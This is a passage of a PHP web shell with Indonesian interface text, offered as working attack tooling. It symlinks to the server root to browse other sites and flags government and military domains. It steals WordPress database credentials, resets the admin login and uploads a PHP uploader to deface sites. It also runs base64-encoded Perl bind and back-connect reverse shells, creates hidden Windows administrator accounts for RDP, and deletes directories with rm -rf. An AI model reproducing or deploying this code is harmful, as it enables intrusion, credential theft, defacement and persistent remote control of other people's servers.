  2350. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2351. $write =@fopen ('sym/.htaccess','w');
  2352. fwrite($write ,$htaccess);
  2353. @symlink('/','sym/root');
  2354. $filelocation = basename(__FILE__);
  2355. $read_named_conf = @file('/etc/named.conf');
  2356. if(!$read_named_conf)
  2357. {
  2358. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  2359. }
  2360. else
  2361. {
  2362. echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  2363. foreach($read_named_conf as $subject){
  2364. if(eregi('zone',$subject)){
  2365. preg_match_all('#zone "(.*)"#',$subject,$string);
  2366. flush();
  2367. if(strlen(trim($string[1][0])) >2){
  2368. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  2369. $name = $UID['name'] ;
  2370. @symlink('/','sym/root');
  2371. $name   = $string[1][0];
  2372. $iran   = '\.ir';
  2373. $israel = '\.il';
  2374. $indo   = '\.id';
  2375. $sg12   = '\.sg';
  2376. $edu    = '\.edu';
  2377. $gov    = '\.gov';
  2378. $gose   = '\.go';
  2379. $gober  = '\.gob';
  2380. $mil1   = '\.mil';
  2381. $mil2   = '\.mi';
  2382. $malay  = '\.my';
  2383. $china  = '\.cn';
  2384. $japan  = '\.jp';
  2385. $austr  = '\.au';
  2386. $porn   = '\.xxx';
  2387. $as     = '\.uk';
  2388. $calfn  = '\.ca';
  2389.  
  2390. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2391. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
  2392. or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
  2393. or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
  2394. {
  2395. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2396. }
  2397. echo "
  2398. <tr>
  2399.  
  2400. <td>
  2401. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2402. </td>
  2403.  
  2404. <td>
  2405. '.$UID['name']."
  2406. </td>
  2407.  
  2408. <td>
  2409. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2410. </td>
  2411.  
  2412. </tr></div> ";
  2413. flush();
  2414. }
  2415. }
  2416. }
  2417. }
  2418.  
  2419. echo "</center></table>";  
  2420.  
  2421. }   elseif($_GET['do'] == 'adminer') {
  2422.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2423.     function adminer($url, $isi) {
  2424.         $fp = fopen($isi, "w");
  2425.         $ch = curl_init();
  2426.               curl_setopt($ch, CURLOPT_URL, $url);
  2427.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2428.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2429.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2430.               curl_setopt($ch, CURLOPT_FILE, $fp);
  2431.         return curl_exec($ch);
  2432.               curl_close($ch);
  2433.         fclose($fp);
  2434.         ob_flush();
  2435.         flush();
  2436.     }
  2437.     if(file_exists('adminer.php')) {
  2438.         echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2439.     } else {
  2440.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2441.             echo "<center><font color=blue><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2442.         } else {
  2443.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  2444.         }
  2445.     }
  2446. } elseif($_GET['do'] == 'auto_dwp') {
  2447.     if($_POST['auto_deface_wp']) {
  2448.         function anucurl($sites) {
  2449.             $ch = curl_init($sites);
  2450.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2451.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2452.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2453.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2454.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2455.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2456.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2457.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2458.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2459.             $data = curl_exec($ch);
  2460.                   curl_close($ch);
  2461.             return $data;
  2462.         }
  2463.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2464.             $post = array(
  2465.                    "log" => "$userr",
  2466.                    "pwd" => "$pass",
  2467.                    "rememberme" => "forever",
  2468.                    "wp-submit" => "$wp_submit",
  2469.                    "redirect_to" => "$web",
  2470.                    "testcookie" => "1",
  2471.                    );
  2472.             $ch = curl_init($cek);
  2473.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2474.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2475.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2476.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2477.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2478.                   curl_setopt($ch, CURLOPT_POST, 1);
  2479.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2480.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2481.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2482.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2483.             $data = curl_exec($ch);
  2484.                   curl_close($ch);
  2485.             return $data;
  2486.         }
  2487.         $scan = $_POST['link_config'];
  2488.         $link_config = scandir($scan);
  2489.         $script = htmlspecialchars($_POST['script']);
  2490.         $user = "global";
  2491.         $pass = "global";
  2492.         $passx = md5($pass);
  2493.         foreach($link_config as $dir_config) {
  2494.             if(!is_file("$scan/$dir_config")) continue;
  2495.             $config = file_get_contents("$scan/$dir_config");
  2496.             if(preg_match("/WordPress/", $config)) {
  2497.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2498.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2499.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2500.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2501.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2502.                 $prefix = $dbprefix."users";
  2503.                 $option = $dbprefix."options";
  2504.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2505.                 $db = mysql_select_db($dbname);
  2506.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2507.                 $result = mysql_fetch_array($q);
  2508.                 $id = $result[ID];
  2509.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2510.                 $result2 = mysql_fetch_array($q2);
  2511.                 $target = $result2[option_value];
  2512.                 if($target == '') {                
  2513.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2514.                 } else {
  2515.                     echo "[+] $target <br>";
  2516.                 }
  2517.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2518.                 if(!$conn OR !$db OR !$update) {
  2519.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2520.                     mysql_close($conn);
  2521.                 } else {
  2522.                     $site = "$target/wp-login.php";
  2523.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  2524.                     $b1 = anucurl($site2);
  2525.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2526.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2527.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2528.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2529.                     $www = "m.php";
  2530.                     $fp5 = fopen($www,"w");
  2531.                     fputs($fp5,$upload3);
  2532.                     $post2 = array(
  2533.                             "_wpnonce" => "$anu2",
  2534.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2535.                             "themezip" => "@$www",
  2536.                             "install-theme-submit" => "Install Now",
  2537.                             );
  2538.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2539.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2540.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2541.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2542.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2543.                           curl_setopt($ch, CURLOPT_POST, 1);
  2544.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2545.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2546.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2547.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2548.                     $data3 = curl_exec($ch);
  2549.                           curl_close($ch);
  2550.                     $y = date("Y");
  2551.                     $m = date("m");
  2552.                     $namafile = "id.php";
  2553.                     $fpi = fopen($namafile,"w");
  2554.                     fputs($fpi,$script);
  2555.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2556.                            curl_setopt($ch6, CURLOPT_POST, true);
  2557.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2558.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2559.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2560.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2561.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2562.                     $postResult = curl_exec($ch6);
  2563.                            curl_close($ch6);
  2564.                     $as = "$target/k.php";
  2565.                     $bs = anucurl($as);
  2566.                     if(preg_match("#$script#is", $bs)) {
  2567.                         echo "[+] <font color='blue'>berhasil mepes...</font><br>";
  2568.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2569.                         } else {
  2570.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  2571.                         echo "[!!] coba aja manual: <br>";
  2572.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2573.                         echo "[+] username: <font color=blue>$user</font><br>";
  2574.                         echo "[+] password: <font color=blue>$pass</font><br><br>";    
  2575.                         }
  2576.                     mysql_close($conn);
  2577.                 }
  2578.             }
  2579.         }
  2580.     } else {
  2581.         echo "<center><h1>WordPress Auto Deface</h1>
  2582.        <form method='post'>
  2583.        <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2584.        <input type='text' name='script' height='10' size='50' placeholder='Hacked By N45HT' required><br>
  2585.        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2586.        </form>
  2587.        <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2588.        </center>";
  2589.     }
  2590. } elseif($_GET['do'] == 'network') {
  2591.     echo "<form method='post'>
  2592.    <u>Bind Port:</u> <br>
  2593.    PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2594.    <input type='submit' name='sub_bp' value='>>'>
  2595.    </form>
  2596.    <form method='post'>
  2597.    <u>Back Connect:</u> <br>
  2598.    Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>��
  2599.    PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2600.    <input type='submit' name='sub_bc' value='>>'>
  2601.    </form>";
  2602.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2603.     if(isset($_POST['sub_bp'])) {
  2604.         $f_bp = fopen("/tmp/bp.pl", "w");
  2605.         fwrite($f_bp, base64_decode($bind_port_p));
  2606.         fclose($f_bp);
  2607.  
  2608.         $port = $_POST['port_bind'];
  2609.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2610.         sleep(1);
  2611.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2612.         unlink("/tmp/bp.pl");
  2613.     }
  2614.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2615.     if(isset($_POST['sub_bc'])) {
  2616.         $f_bc = fopen("/tmp/bc.pl", "w");
  2617.         fwrite($f_bc, base64_decode($bind_connect_p));
  2618.         fclose($f_bc);
  2619.  
  2620.         $ipbc = $_POST['ip_bc'];
  2621.         $port = $_POST['port_bc'];
  2622.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2623.         sleep(1);
  2624.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2625.         unlink("/tmp/bc.pl");
  2626.     }
  2627. } elseif($_GET['do'] == 'krdp_shell') {
  2628.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2629.         if($_POST['create']) {
  2630.             $user = htmlspecialchars($_POST['user']);
  2631.             $pass = htmlspecialchars($_POST['pass']);
  2632.             if(preg_match("/$user/", exe("net user"))) {
  2633.                 echo "[INFO] -> <font color=red>user <font color=blue>$user</font> sudah ada</font>";
  2634.             } else {
  2635.                 $add_user   = exe("net user $user $pass /add");
  2636.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  2637.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  2638.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  2639.                 echo "[ RDP ACCOUNT INFO ]<br>
  2640.                ------------------------------<br>
  2641.                IP: <font color=blue>".$ip."</font><br>
  2642.                Username: <font color=blue>$user</font><br>
  2643.                Password: <font color=blue>$pass</font><br>
  2644.                ------------------------------<br><br>
  2645.                [ STATUS ]<br>
  2646.                ------------------------------<br>
  2647.                ";
  2648.                 if($add_user) {
  2649.                     echo "[add user] -> <font color='blue'>Berhasil</font><br>";
  2650.                 } else {
  2651.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  2652.                 }
  2653.                 if($add_groups1) {
  2654.                     echo "[add localgroup Administrators] -> <font color='blue'>Berhasil</font><br>";
  2655.                 } elseif($add_groups2) {
  2656.                     echo "[add localgroup Administrator] -> <font color='blue'>Berhasil</font><br>";
  2657.                 } elseif($add_groups3) {
  2658.                     echo "[add localgroup Administrateur] -> <font color='blue'>Berhasil</font><br>";
  2659.                 } else {
  2660.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2661.                 }
  2662.                 echo "------------------------------<br>";
  2663.             }
  2664.         } elseif($_POST['s_opsi']) {
  2665.             $user = htmlspecialchars($_POST['r_user']);
  2666.             if($_POST['opsi'] == '1') {
  2667.                 $cek = exe("net user $user");
  2668.                 echo "Checking username <font color=blue>$user</font> ....... ";
  2669.                 if(preg_match("/$user/", $cek)) {
  2670.                     echo "[ <font color=blue>Sudah ada</font> ]<br>
  2671.                    ------------------------------<br><br>
  2672.                    <pre>$cek</pre>";
  2673.                 } else {
  2674.                     echo "[ <font color=red>belum ada</font> ]";
  2675.                 }
  2676.             } elseif($_POST['opsi'] == '2') {
  2677.                 $cek = exe("net user $user global");
  2678.                 if(preg_match("/$user/", exe("net user"))) {
  2679.                     echo "[change password: <font color=blue>global</font>] -> ";
  2680.                     if($cek) {
  2681.                         echo "<font color=blue>Berhasil</font>";
  2682.                     } else {
  2683.                         echo "<font color=red>Gagal</font>";
  2684.                     }
  2685.                 } else {
  2686.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> belum ada</font>";
  2687.                 }
  2688.             } elseif($_POST['opsi'] == '3') {
  2689.                 $cek = exe("net user $user /DELETE");
  2690.                 if(preg_match("/$user/", exe("net user"))) {
  2691.                     echo "[remove user: <font color=blue>$user</font>] -> ";
  2692.                     if($cek) {
  2693.                         echo "<font color=blue>Berhasil</font>";
  2694.                     } else {
  2695.                         echo "<font color=red>Gagal</font>";
  2696.                     }
  2697.                 } else {
  2698.                     echo "[INFO] -> <font color=red>user <font color=blue>$user</font> belum ada</font>";
  2699.                 }
  2700.             } else {
  2701.                 //
  2702.             }
  2703.         } else {
  2704.             echo "-- Create RDP --<br>
  2705.            <form method='post'>
  2706.            <input type='text' name='user' placeholder='username' value='global' required>
  2707.            <input type='text' name='pass' placeholder='password' value='global' required>
  2708.            <input type='submit' name='create' value='>>'>
  2709.            </form>
  2710.            -- Option --<br>
  2711.            <form method='post'>
  2712.            <input type='text' name='r_user' placeholder='username' required>
  2713.            <select name='opsi'>
  2714.            <option value='1'>Cek Username</option>
  2715.            <option value='2'>Ubah Password</option>
  2716.            <option value='3'>Hapus Username</option>
  2717.            </select>
  2718.            <input type='submit' name='s_opsi' value='>>'>
  2719.            </form>
  2720.            ";
  2721.         }
  2722.     } else {
  2723.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2724.     }
  2725. } elseif($_GET['act'] == 'newfile') {
  2726.     if($_POST['new_save_file']) {
  2727.         $newfile = htmlspecialchars($_POST['newfile']);
  2728.         $fopen = fopen($newfile, "a+");
  2729.         if($fopen) {
  2730.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2731.         } else {
  2732.             $act = "<font color=red>permission denied</font>";
  2733.         }
  2734.     }
  2735.     echo $act;
  2736.     echo "<form method='post'>
  2737.    Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2738.    <input type='submit' name='new_save_file' value='Submit'>
  2739.    </form>";
  2740. } elseif($_GET['act'] == 'newfolder') {
  2741.     if($_POST['new_save_folder']) {
  2742.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2743.         if(!mkdir($new_folder)) {
  2744.             $act = "<font color=red>permission denied</font>";
  2745.         } else {
  2746.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2747.         }
  2748.     }
  2749.     echo $act;
  2750.     echo "<form method='post'>
  2751.    Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2752.    <input type='submit' name='new_save_folder' value='Submit'>
  2753.    </form>";
  2754. } elseif($_GET['act'] == 'rename_dir') {
  2755.     if($_POST['dir_rename']) {
  2756.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2757.         if($dir_rename) {
  2758.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2759.         } else {
  2760.             $act = "<font color=red>permission denied</font>";
  2761.         }
  2762.     echo "".$act."<br>";
  2763.     }
  2764.     echo "<form method='post'>
  2765.    <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2766.    <input type='submit' name='dir_rename' value='rename'>
  2767.    </form>";
  2768. } elseif($_GET['act'] == 'delete_dir') {
  2769.     if(is_dir($dir)) {
  2770.         if(is_writable($dir)) {
  2771.             @rmdir($dir);
  2772.             @exe("rm -rf $dir");
  2773.             @exe("rmdir /s /q $dir");
  2774.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2775.         } else {
  2776.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2777.         }
  2778.     }
  2779.     echo $act;
  2780. } elseif($_GET['act'] == 'view') {
  2781.     echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2782.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2783. } elseif($_GET['act'] == 'edit') {
  2784.     if($_POST['save']) {
  2785.         $save = file_put_contents($_GET['file'], $_POST['src']);
  2786.         if($save) {
  2787.             $act = "<font color=blue>Saved!</font>";
  2788.         } else {
  2789.             $act = "<font color=red>permission denied</font>";
  2790.         }
  2791.     echo "".$act."<br>";
  2792.     }
  2793.     echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2794.     echo "<form method='post'>
  2795.    <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2796.    <input type='submit' value='Save' name='save' style='width: 500px;'>
  2797.    </form>";
  2798. } elseif($_GET['act'] == 'rename') {
  2799.     if($_POST['do_rename']) {
  2800.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2801.         if($rename) {
  2802.             $act = "<script>window.location='?dir=".$dir."';</script>";
  2803.         } else {
  2804.             $act = "<font color=red>permission denied</font>";
  2805.         }
  2806.     echo "".$act."<br>";
  2807.     }
  2808.     echo "Filename: <font color=blue>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2809.     echo "<form method='post'>
  2810.    <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2811.    <input type='submit' name='do_rename' value='rename'>
  2812.    </form>";
  2813. } elseif($_GET['act'] == 'delete') {
  2814.     $delete = unlink($_GET['file']);
  2815.     if($delete) {
  2816.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2817.     } else {
  2818.         $act = "<font color=red>permission denied</font>";
  2819.     }
  2820.     echo $act;
  2821. } else {
  2822.     if(is_dir($dir) === true) {
  2823.         if(!is_readable($dir)) {
  2824.             echo "<font color=lavender>can't open directory. ( not readable )</font>";
  2825.         } else {
  2826.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2827.            <tr>
  2828.            <th class="th_home"><center>Name</center></th>
  2829.            <th class="th_home"><center>Type</center></th>
  2830.            <th class="th_home"><center>Size</center></th>
  2831.            <th class="th_home"><center>Last Modified</center></th>
  2832.            <th class="th_home"><center>Owner/Group</center></th>
  2833.            <th class="th_home"><center>Permission</center></th>
  2834.            <th class="th_home"><center>Action</center></th>
  2835.            </tr>';
  2836.             $scandir = scandir($dir);
  2837.             foreach($scandir as $dirx) {
  2838.                 $dtype = filetype("$dir/$dirx");
  2839.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2840.                 if(function_exists('posix_getpwuid')) {
  2841.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2842.                     $downer = $downer['name'];
  2843.                 } else {
  2844.                     //$downer = $uid;
  2845.                     $downer = fileowner("$dir/$dirx");
  2846.                 }
  2847.                 if(function_exists('posix_getgrgid')) {
  2848.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2849.                     $dgrp = $dgrp['name'];
  2850.                 } else {
  2851.                     $dgrp = filegroup("$dir/$dirx");
  2852.                 }
  2853.                 if(!is_dir("$dir/$dirx")) continue;
  2854.                 if($dirx === '..') {
  2855.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2856.                 } elseif($dirx === '.') {
  2857.                     $href = "<a href='?dir=$dir'>$dirx</a>";
  2858.                 } else {
  2859.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2860.                 }
  2861.                 if($dirx === '.' || $dirx === '..') {
  2862.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2863.                     } else {
  2864.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2865.                 }
  2866.                 echo "<tr>";
  2867.                  echo "<td class='td_home'><img src='http://icons.iconarchive.com/icons/binassmax/pry-frente-black-special/24/ribbon-3-icon.png'>$href</td>";
  2868.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2869.                 echo "<td class='td_home'><center>-</center></th></td>";
  2870.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2871.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2872.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2873.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2874.                 echo "</tr>";
  2875.             }
  2876.         }
  2877.     } else {
  2878.         echo "<font color=red>can't open directory.</font>";
  2879.     }
  2880.         foreach($scandir as $file) {
  2881.             $ftype = filetype("$dir/$file");
  2882.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2883.             $size = filesize("$dir/$file")/1024;
  2884.             $size = round($size,3);
  2885.             if(function_exists('posix_getpwuid')) {
  2886.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2887.                 $fowner = $fowner['name'];
  2888.             } else {
  2889.                 //$downer = $uid;
  2890.                 $fowner = fileowner("$dir/$file");
  2891.             }
  2892.             if(function_exists('posix_getgrgid')) {
  2893.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2894.                 $fgrp = $fgrp['name'];
  2895.             } else {
  2896.                 $fgrp = filegroup("$dir/$file");
  2897.             }
  2898.             if($size > 1024) {
  2899.                 $size = round($size/1024,2). 'MB';
